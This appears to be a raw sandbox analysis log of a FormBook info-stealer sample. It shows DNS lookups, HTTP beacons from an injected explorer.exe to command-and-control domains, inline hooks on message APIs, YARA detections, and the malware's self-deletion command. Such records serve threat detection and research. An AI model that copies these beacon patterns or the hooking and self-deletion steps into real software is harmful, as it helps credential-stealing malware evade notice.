May 13, 2022 19:44:47.921972036 CEST | 49407 | 53 | 192.168.2.5 | 8.8.8.8
May 13, 2022 19:44:48.093338013 CEST | 53 | 49407 | 8.8.8.8 | 192.168.2.5
May 13, 2022 19:45:07.338747978 CEST | 59933 | 53 | 192.168.2.5 | 8.8.8.8
May 13, 2022 19:45:08.341361046 CEST | 59933 | 53 | 192.168.2.5 | 8.8.8.8
May 13, 2022 19:45:08.829252958 CEST | 53 | 59933 | 8.8.8.8 | 192.168.2.5
May 13, 2022 19:45:09.802239895 CEST | 53 | 59933 | 8.8.8.8 | 192.168.2.5
May 13, 2022 19:45:29.028887987 CEST | 50829 | 53 | 192.168.2.5 | 8.8.8.8
May 13, 2022 19:45:29.050872087 CEST | 53 | 50829 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 13, 2022 19:45:09.802361965 CEST | 192.168.2.5 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 13, 2022 19:44:47.921972036 CEST | 192.168.2.5 | 8.8.8.8 | 0xa865 | Standard query (0) | www.qzbozhijy.com | A (IP address) | IN (0x0001)
May 13, 2022 19:45:07.338747978 CEST | 192.168.2.5 | 8.8.8.8 | 0xe307 | Standard query (0) | www.lume24.com | A (IP address) | IN (0x0001)
May 13, 2022 19:45:08.341361046 CEST | 192.168.2.5 | 8.8.8.8 | 0xe307 | Standard query (0) | www.lume24.com | A (IP address) | IN (0x0001)
May 13, 2022 19:45:29.028887987 CEST | 192.168.2.5 | 8.8.8.8 | 0x3c1f | Standard query (0) | www.cryptocurrenciesmarketcaps.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 13, 2022 19:44:48.093338013 CEST | 8.8.8.8 | 192.168.2.5 | 0xa865 | No error (0) | www.qzbozhijy.com | | 170.75.150.177 | A (IP address) | IN (0x0001)
May 13, 2022 19:45:08.829252958 CEST | 8.8.8.8 | 192.168.2.5 | 0xe307 | Server failure (2) | www.lume24.com | none | none | A (IP address) | IN (0x0001)
May 13, 2022 19:45:09.802239895 CEST | 8.8.8.8 | 192.168.2.5 | 0xe307 | Server failure (2) | www.lume24.com | none | none | A (IP address) | IN (0x0001)
May 13, 2022 19:45:29.050872087 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c1f | No error (0) | www.cryptocurrenciesmarketcaps.com | | 35.186.238.101 | A (IP address) | IN (0x0001)
                    • www.qzbozhijy.com
                    • www.cryptocurrenciesmarketcaps.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49809 | 170.75.150.177 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 19:44:48.311563969 CEST | 9033 | OUT | GET /m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 HTTP/1.1
                    Host: www.qzbozhijy.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
May 13, 2022 19:44:48.424303055 CEST | 9034 | IN | HTTP/1.1 200 OK
                    Server: nginx
                    Date: Fri, 13 May 2022 17:44:48 GMT
                    Content-Type: text/html
                    Content-Length: 785
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c6 bc cf e7 ca d8 b6 d9 bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 
73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49871 | 35.186.238.101 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 19:45:29.073164940 CEST | 10125 | OUT | GET /m9y5/?GDHDO=nj3oxEIT1zdIdiXK9EykkBiMkkzJg0Of7VGGA4YdAoGVUT4DfIqyC+XPG7GpV3gppNhE&2d0tk4=7nxxAXLHM4 HTTP/1.1
                    Host: www.cryptocurrenciesmarketcaps.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
May 13, 2022 19:45:29.187019110 CEST | 10125 | IN | HTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Fri, 13 May 2022 17:45:29 GMT
                    Content-Type: text/html
                    Content-Length: 291
                    ETag: "627e693c-123"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                    Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEE
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEE
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEE


                    Target ID:0
                    Start time:19:43:24
                    Start date:13/05/2022
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe"
                    Imagebase:0x400000
                    File size:277920 bytes
                    MD5 hash:69250F55FBFE48822C838B4EEAF33A0A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:1
                    Start time:19:43:26
                    Start date:13/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                    Imagebase:0x1190000
                    File size:80384 bytes
                    MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Target ID:2
                    Start time:19:43:27
                    Start date:13/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                    Imagebase:0x1190000
                    File size:80384 bytes
                    MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Target ID:5
                    Start time:19:43:33
                    Start date:13/05/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff74fc70000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Target ID:13
                    Start time:19:44:02
                    Start date:13/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\cmd.exe
                    Imagebase:0x1100000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    Target ID:15
                    Start time:19:44:07
                    Start date:13/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
                    Imagebase:0x1100000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:16
                    Start time:19:44:08
                    Start date:13/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff77f440000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    No disassembly